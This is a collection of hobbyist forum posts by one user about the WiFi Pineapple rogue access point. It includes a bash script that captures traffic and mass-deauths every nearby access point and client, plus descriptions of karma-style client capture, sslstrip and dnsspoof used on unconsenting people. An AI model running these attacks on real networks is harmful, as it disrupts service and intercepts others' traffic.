telot

Do you have any spare access points, so that you turn your meraki's AirMarshal mode on to continuous scan? If not, do you have AirMarshal on opportunistic scan? I haven't yet tested my new meraki (I got the free one) with the pineapple, to see if its detected, but that might be one way to bust the culprit. telot

mreidiv: First off, good to see you posting again! It's been a while, so welcome back to the community Second, for advice on ssmtp, you might find value in my post on the subject: http://forums.hak5.org/index.php?/topic/25966-sent-from-my-pineapple/?hl=ssmtp Enjoy telot

It seems that you get to a point where its not what you know, but how good at googling you are. No one can know everything anymore (Aristotle was heralded as the last man to know everything), now the name of the game is who can access the information best/quickest/most efficiently. Theres tons of good articles about google-fu you can read up on to bolster your skills. Modifiers like site, type, file, +, - are all amazing tools to help you narrow down the results to exactly what you're looking for. telot

Over a 112,000 views...I'd say a lot of people read these things! telot

Ooo! I have the best answer? Mr. P, where do I find the reward pastries? ;) Glad I could help telot

Heres a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - its all mentioned in the first blahb of commented text. Hope it helps #!/bin/sh #telot presents....:::drum roll::: #One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy! #Note that this script makes quite a few assumptions. They are: #You are using backtrack5R1. #Your interface that is connecting to the internet is wlan0 #Your interface that is connecting to the pineapple is eth0 #You have a alfa realtek usb card capable of monitor mode plugged in. #You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script). #You have not run wp3.sh or any other network configuration stuff. #You have your pineapple configured to autostart karma at bootup. #This script is meant to run on your laptop upon bootup. # #Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant. #So the internet I'm serving up in my pentest lab is actually run through my cellphone. #So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth. # # #Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah # # #I'm keeping most configuration and capture files on the desktop for ease. cd /root/Desktop/ #Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line. #iwconfig wlan0 essid EssidOfAPyouWantToUse wpa_supplicant -B Dwext -i wlan0 -c Jack.conf dhclient wlan0 #Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary. #Bring up Ethernet Interface directly connected to Pineapple ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up # Enable IP Forwarding echo '1' > /proc/sys/net/ipv4/ip_forward echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " cat /proc/sys/net/ipv4/ip_forward #clear chains and rules iptables -X iptables -F echo iptables chains and rules cleared #setup IP forwarding iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE echo IP Forwarding Enabled #remove default route route del default echo Default route removed #add default gateway route add default gw 192.168.1.1 wlan0 echo Pineapple Default Gateway Configured #instructions #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan ping -c3 172.16.42.1 if [ $? -eq 0 ]; then echo "ICS configuration successful." #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" #echo "Enter Pineapple password if prompted" #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' fi echo "" echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!" echo "" #Now on to the fun stuff! # # # #Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit. #Remember to screen -r back to it and get rid of it when you're done. screen -d -m wireshark -i eth0 -k -w sharkcap & #This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop). #This is also created in a detached screen. So remember to cleanup when you're done! # # #Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys. #I set mine to allow the pineapple & my hotspot and deny everyone else. ifconfig wlan1 up airmon-ng start wlan1 cd /pentest/wireless/airdrop-ng/ screen -d -m airodump-ng mon0 -w capfile --output-format csv sleep 20 python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf telot

I just signed up for the security tube course. Its pretty good, but Vivek is definitely catering to those who already know how to program...which sucks because I don't (other than some complex bash scripting...). He kind of breezes through the beginner stuff, where I would prefer a little more detailed instruction. I'm supplementing it with learnpython.org and other free sites. I just love Vivek...he might not be trying to be funny, but he gets a few laughs out of me everytime regardless. "Halo Security Tube and velcome to the Ess Pee Ess See tutorial course" telot

I think I read something on hacker news last night on the plane about them taking it semi-opensource. Because he is so hated by so many, people are stepping up and poking holes through all their code to show what a blow hard he is, but mega is turning it around and fixing it right away. Its kinda cool how they're taking lemons and making it lemonade. I used megaupload all the time - back then it really did fix a problem I had (sending large files via email). Now I've got so many more legit options (dropbox, google drive, or just throw it on a VPS webserver) I really don't see a need for it anymore. Then again, 50GB FREE is pretty huge... telot

Badass! I was just looking into porting the whole 'use gchat as an easy remote shell into your raspberry pi' onto the pineapple, but this effectively does the same thing but without the reliance on gchat (of which there aren't many good client options on iOS). This looks quite awesome newbi3! Gtalk remote shell hack for raspberry pi can be found here: http://mitchtech.net/raspberry-pi-google-talk-robot/ telot

I've done guides for both of those things. You'll find them on the wiki http://cloud.wifipineapple.com/wiki/doku.php telot

Looks awesome Whistle Master! I've been waiting for this one so long I made a faux-interceptor with my raspberry pi, but I'd so much rather use the mark4 hardware. Your contributions make the pineapple what it is WM, thanks again. telot

Badass! I'll be loading it up today! Thanks WM and Moriarty! telot

maybe check your .bash_history file? I'm not sure if the history is written upon execution of the command, or after the completion of it though... telot

I like it alfa147x! Its very clean. Also, while the default black and green does score hacker points with fellow security enthusiasts, it does look quite suspicious to the ignorant masses. While I don't use the gui much at all, I have my pineapple email me with its status every 10 mins (checking emails on your phone is ultra-lowkey in public!). For those who do use the gui in public, your css looks like any other dashboard you'd find for various web services. Very nice! telot

I've run into that too sublime - sometimes its better to offload some of the more intensive things to a proper computer, and leave the pineapple to do what it does best :) telot

You got it now! The sniffing won't be automatic, unless you set a script to start it automatically upon bootup or button press (as I do). I run tcpdump and sslstrip - you can lookup some of my scripts that I use on the jasager forum. Most of the things you want to do are available, but they need to be added via opkg or the 'pineapple bar' if you want a gui. You don't need to target a client like cain, but you can filter for certain things with tcpdump of course. As for the attacks you mention, ettercap is not working yet, but whistlemaster and digininja are working on something along those lines. arpspoof is unnecessary, since you're already the man in the middle. hamster&ferret, I'm really not sure - I know theres been mention of it in the past, so maybe search the forums for any info regarding those tools. I mainly use sslstrip + tcpdump for my applications - or dnsspoof when I'm pulling some pranks on my wife and her friends hehe It is always great to learn new things, and we're always glad to have more users and contributors! Word to the wise though, if you have any additional questions regarding the pineapple, please post in the Jasager forums. Thats where all the pineapple experts reside ;) telot

It doesn't actually "steal" the already connected computers. When the computer boots up or the wifi card is turned on, it sends out probe requests. It says "HEY GUISE! I'M LOOKING FOR ATT_WIFI and BOINGO HOTSPOT" because it has remembered those. If the pineapple hears that request before any legit att_wifi or boingo hotspot access points hear it, it will respond with "YEAH d00d, right here! Connect to me br0!". Apparently the pineapple is a kind of frat jock today. Now, if paired with an extra alfa wifi card, the pineapple can deauth the legit access points nearby. If you deauth well enough (I like to deauth the living daylights out of my legit APs - I find great joy in it haha) the legit devices connected to that AP will start looking for a new one, as they've now been kicked off. Thats when the pineapple will say "Well bud, you can connect to me instead!" I'm not sure about the iphone tethering - maybe? You can provide it internet via a normal router, as long as its configured properly. telot

My pleasure Thetra - good luck! Pwnd2Pwnr: I'd guess its also compatible with alfa's other routes (the NHA for example), but the 036H is what they recommend and is what is apparently most supported. telot

Eagle nest monitoring is something I can totally get behind! According to amazon (the first hit on google: http://www.amazon.com/Alfa-R36-Repeater-Extender-AWUS036H/dp/B004ZF0I3U), you need to also pair this with a AWUS036H to make it an extender. So the wifi comes in on the 036H and goes back out on the R36. This can totally be done with solar/batts setup. The R36 is accepts a 12V input. What we do in my job is use 6V deep cycle marine batteries in series to make 12V (http://www.zbattery.com/Connecting-Batteries-in-Series-or-Parallel) as that is the best for longevity and AmpHour per dollar. As for what sized panel you'll need - add up the power usage of the R36 + 036H and consult an online solar panel calculator. Since you're in norway and its currently winter in the northern hemisphere, if the calc doesn't take location into consideration, go for an additional 30% in wattage. Hell, add 50% for good measure and be sure to point the panel south. In return for this wealth of knowledge (I deal with solar/batts on a daily basis for my job) I'll except a link to the eagle monitoring webcam :D telot

Damn! Thanks for linking...looks like my personal 3 wrt54's will be getting pen tested in ~2 weeks! telot

I heard from Mr. P that he was having some database issues with other threads - could this be another case of corrupted information? telot

I'd instead recommend CrashPlan. Darren uses it. I use it. Check them out. They are also unlimited, and also have ridic encryption. telot

An rfcat/cc1111/toorcon14 badge forums would be awesome as well! Or maybe just a software defined radio forum. Either way theres very little community-related stuff (besides an irc full of lurkers) for the SDR stuff... telot

First off, Barry, what are you holding out on us dude? What are those things and for the love of god take my money NOW. They look like Sharp made badass zipit's on crack! Anyways, what you're looking for Seek0380, is a WIPS (or really WIDS) - a Wireless Intrusion Detection/Prevention System. That is almost exactly opposite of what the pineapple is/does. The pineapple is by very definition a rogue access point, which is exactly what WIPS detect and contain. Meraki has a free access point you can get by watching one of their webinars. It has a feature called Air Marshal, which is WIPS. Get one of those for sure. Keep in mind though, in my initial testing the meraki has not yet detected a karma'd rogue access point hehe. It does however detect every other legit access point in my house/neighborhood. If you want to learn about wifi and get to know the low-ish level stuff, you can do the same thing with an Alfa card (or the pineapple) in monitor mode. This is the fun/cool/hackerish way. I would highly recommend doing it with an alfa card, as its much more supported, and that way you don't have to mess with the pineapples workings (pass it along to a friend who will use it what its intended instead :). Step 1: Plug in Alfa AWUS036H to laptop Step 2: Open up virtual machine running Backtrack Step 3: Forward the alfa to the virtual machine (the alfa may show up as Realtek) Step 4: Open terminal and type: airmon-ng start wlan0 Step 5: Type in airodump-ng mon0 Step 6: Enjoy seeing every access point (hidden ssid or not) within range telot

Well, what help do you need? Be more specific! telot